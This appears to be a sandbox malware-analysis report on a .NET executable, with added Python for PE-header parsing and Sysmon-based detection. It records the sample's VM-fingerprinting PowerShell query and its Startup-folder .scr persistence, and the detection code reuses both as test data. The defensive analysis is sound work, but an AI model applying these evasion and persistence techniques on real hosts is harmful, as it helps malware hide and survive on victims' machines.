              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
              (A further powershell.exe instance loaded the same powershell.exe module list as above and, in addition, the following.)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: apDMcnqqWs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: apDMcnqqWs.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: apDMcnqqWs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

              Data Obfuscation

              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER (2 instances)
              Source: apDMcnqqWs.exe | Static PE information: 0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Code function: 0_2_00007FFD34880D32 push eax; retn 3477h | 0_2_00007FFD34880E11
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Code function: 0_2_00007FFD348800BD pushad ; iretd | 0_2_00007FFD348800C1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Code function: 0_2_00007FFD34898173 push ebx; ret | 0_2_00007FFD3489816A
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Code function: 0_2_00007FFD348A1968 push eax; ret | 0_2_00007FFD348A1BB1
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Code function: 0_2_00007FFD34898163 push ebx; ret | 0_2_00007FFD3489816A
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Code function: 0_2_00007FFD34A56A35 pushad ; retf | 0_2_00007FFD34A56A5D
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Code function: 0_2_00007FFD34A4D715 push eax; retf | 0_2_00007FFD34A4D761
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3478D2A5 pushad ; iretd | 2_2_00007FFD3478D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34972316 push 8B485F93h; iretd | 2_2_00007FFD3497231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFD348A19BB pushad ; ret | 14_2_00007FFD348A19C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFD348A1B40 pushad ; iretd | 18_2_00007FFD348A1B4D
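              The static PE facts in this report (a COM descriptor directory, the DllCharacteristics flags and a TimeDateStamp that decodes to 25 July 2100) can be re-derived from the first few hundred bytes of the file. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses those header fields from a PE32+ header that is constructed in memory with the reported values (the RVAs in the directory entries are made up; pass real file bytes to parse_pe_header() to check an actual sample). Two caveats belong with the findings above. A COM descriptor marks a .NET assembly, and the C# compiler's deterministic builds write a hash of the compilation into TimeDateStamp rather than a build time, so a far-future stamp on a managed binary is weak evidence on its own; the function therefore reports whether the stamp can be read as a clock value at all. And the push/ret "code function" sequences at 0x7FFD… addresses are what a linear-sweep disassembler finds in x64 JIT and module memory in clean .NET processes as well, so they should not be read as evidence of obfuscation without a second indicator.

```python
"""Re-derive the "Static PE information" facts from a PE header.

Added example, not part of the sandbox report: parses the COFF header's
TimeDateStamp, the optional header's DllCharacteristics and the data directory
table.  A constructed PE32+ header carrying the reported values is built in
memory so the code runs offline; pass real file bytes to parse_pe_header().
"""
import struct
from datetime import datetime, timedelta, timezone

IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B

# IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
# IMAGE_DIRECTORY_ENTRY_* names, indexed by position in the data directory table
DATA_DIRECTORIES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
    "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
    "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
MACHINES = {0x014C: "x86", 0x8664: "x64", 0xAA64: "ARM64"}
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def parse_pe_header(data: bytes, now=None) -> dict:
    """Return the header facts a triage analyst checks first."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsec, timestamp, _, _, _opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                      # IMAGE_FILE_HEADER is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC:
        ndirs_off, dirs_off = 108, 112   # PE32+ layout
    elif magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        ndirs_off, dirs_off = 92, 96     # PE32 layout
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    # DllCharacteristics sits at offset 70 in both layouts.
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
    present = []
    for i in range(min(ndirs, len(DATA_DIRECTORIES))):
        rva, size = struct.unpack_from("<II", data, opt + dirs_off + 8 * i)
        if rva or size:
            present.append(DATA_DIRECTORIES[i])
    # TimeDateStamp is seconds since 1970-01-01 UTC; adding a timedelta keeps
    # values past 2038 correct regardless of the platform's time_t width.
    compiled = UNIX_EPOCH + timedelta(seconds=timestamp)
    now = now or datetime.now(timezone.utc)
    is_dotnet = "COM_DESCRIPTOR" in present
    return {
        "machine": MACHINES.get(machine, f"{machine:#06x}"),
        "timestamp_raw": timestamp,
        "compiled": compiled,
        "timestamp_in_future": compiled > now,
        # Deterministic .NET builds store a content hash in this field, not a
        # clock value, so an implausible stamp on a managed image is expected.
        "timestamp_is_clock": not is_dotnet,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "data_directories": present,
        "is_dotnet": is_dotnet,
    }


def build_sample_header(timestamp: int, dll_chars: int, directories: dict) -> bytes:
    """Constructed sample: a bare PE32+ header (no sections) for offline use."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))            # e_lfanew: right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 0, timestamp, 0, 0, 240, 0x0022)
    opt = bytearray(240)                                     # PE32+ optional header size
    struct.pack_into("<H", opt, 0, IMAGE_NT_OPTIONAL_HDR64_MAGIC)
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 108, 16)                     # NumberOfRvaAndSizes
    for index, (rva, size) in directories.items():
        struct.pack_into("<II", opt, 112 + 8 * index, rva, size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Values mirroring the report: an x64 .NET image (COM descriptor present), the
# five reported DllCharacteristics flags and TimeDateStamp 0xF5959D04.
SAMPLE_HEADER = build_sample_header(
    timestamp=0xF5959D04,
    dll_chars=0x0020 | 0x0040 | 0x0100 | 0x0400 | 0x8000,
    directories={6: (0x2000, 28), 14: (0x2008, 72)},        # DEBUG, COM_DESCRIPTOR (RVAs invented)
)

if __name__ == "__main__":
    info = parse_pe_header(SAMPLE_HEADER)
    print(info["compiled"].isoformat(), info["dll_characteristics"], info["data_directories"])
```

              Run against a real sample, the "compiled" value should be read together with "timestamp_is_clock": for the image in this report it is False, so the year-2100 stamp says nothing about tampering, and the five flags are the normal defaults for a modern toolchain.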

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr (3 instances)

              Boot Survival

              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr (3 instances)
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr\:Zone.Identifier:$DATA
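              The Persistence and Boot Survival entries describe one concrete chain: the sample writes 4z5ru.scr into the all-users Startup folder under C:\ProgramData (so it runs for every account that logs on) and then writes a Zone.Identifier alternate data stream on it, and, under Data Obfuscation, it spawns PowerShell to read PROCESSOR_IDENTIFIER from the Session Manager environment key, a cheap way to fingerprint the CPU of an analysis host. The Python below is an added example, not part of the report, of detection logic for those three behaviours run over Sysmon-style records (Event IDs 1, 11 and 15). The records are constructed samples shaped after the report's paths and command line, not sandbox output; the field names follow Sysmon's, the ZoneId=3 stream content and the two benign comparison events are assumptions, and the severity ratings are the author's choice.

```python
"""Detection logic for the Startup-folder persistence chain and the
host-fingerprinting PowerShell spawn, run over Sysmon-style event records.

Added example, not part of the sandbox report.  SAMPLE_EVENTS are constructed
records shaped after the report's paths and command line; field names follow
Sysmon Event IDs 1 (ProcessCreate), 11 (FileCreate) and 15 (FileCreateStreamHash).
Real events with the same field names can be passed to triage() directly.
"""
import re
from pathlib import PureWindowsPath

# Per-user and all-users Startup folders share this tail; anything executable
# placed there runs at the next logon (all-users: for every account on the host).
STARTUP_FOLDER_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# File types the shell will run from a Startup folder without further prompting.
AUTORUN_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".vbe",
                      ".js", ".jse", ".wsf", ".hta", ".lnk", ".ps1"}
# The registry query the sample issued: returns the CPU model string, which is
# a cheap way to recognise a virtualised analysis host.
FINGERPRINT_RE = re.compile(
    r"Session Manager\\Environment.*PROCESSOR_IDENTIFIER", re.IGNORECASE | re.DOTALL)
# Parents from which a person would plausibly type that query themselves.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                       "windowsterminal.exe", "code.exe"}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def triage_event(event: dict) -> list:
    """Return (rule, detail) findings for a single event; empty if nothing matched."""
    findings = []
    eid = event["EventID"]
    if eid == 1:
        image, cmd = _basename(event["Image"]), event.get("CommandLine", "")
        if image in {"powershell.exe", "pwsh.exe"} and FINGERPRINT_RE.search(cmd):
            parent = _basename(event.get("ParentImage", ""))
            # Spawned by an arbitrary binary rather than a shell: rate it higher.
            severity = "low" if parent in INTERACTIVE_PARENTS else "medium"
            findings.append(("powershell_cpu_fingerprint", f"{severity}: parent={parent}"))
    elif eid in (11, 15):
        target = event["TargetFilename"]
        if STARTUP_FOLDER_RE.search(target):
            ext = PureWindowsPath(target).suffix.lower()
            if eid == 11 and ext in AUTORUN_EXTENSIONS:
                # .scr/.pif/.com are PE files wearing a non-.exe extension.
                severity = "high" if ext in {".scr", ".pif", ".com"} else "medium"
                findings.append(("startup_folder_autorun_drop",
                                 f"{severity}: {target} written by {_basename(event['Image'])}"))
            if eid == 15 and "ZoneId=3" in event.get("Contents", ""):
                # Zone.Identifier with ZoneId=3 is Mark-of-the-Web: the autorun
                # item carries an Internet-zone origin rather than a local install.
                findings.append(("startup_item_marked_internet", target))
    return findings


def triage(events: list) -> list:
    """Run triage_event over a batch; returns one dict per finding, in event order."""
    return [{"index": i, "rule": rule, "detail": detail}
            for i, event in enumerate(events)
            for rule, detail in triage_event(event)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = r"C:\Users\user\Desktop\apDMcnqqWs.exe"
STARTUP_ALL_USERS = r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
QUERY = ("Get-ItemPropertyValue -Path 'HKLM:System\\CurrentControlSet\\Control\\"
         "Session Manager\\Environment' -Name PROCESSOR_IDENTIFIER")

# Constructed sample events (not sandbox output): the reported chain, followed
# by two benign look-alikes that the rules must not rate the same way.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": SAMPLE, "CommandLine": f'"powershell.exe" {QUERY}'},
    {"EventID": 11, "Image": SAMPLE, "TargetFilename": STARTUP_ALL_USERS + r"\4z5ru.scr"},
    {"EventID": 15, "Image": SAMPLE, "TargetFilename": STARTUP_ALL_USERS + r"\4z5ru.scr",
     "Contents": "[ZoneTransfer]  ZoneId=3"},                # assumed stream content
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe {QUERY}"},               # an admin typing the same query
    {"EventID": 11, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

              On the constructed batch the sample's three events produce one finding each, the interactive PowerShell query is kept but rated low, and the installer's desktop.ini write in a Startup folder is ignored because it is not an autorun file type. The parent-process check is what separates the sample's query from an administrator's; tune INTERACTIVE_PARENTS to the management tooling in use before deploying.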

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 instances)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 instances)
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Process information set: NOOPENFILEERRORBOX (61 instances)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (48 instances)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
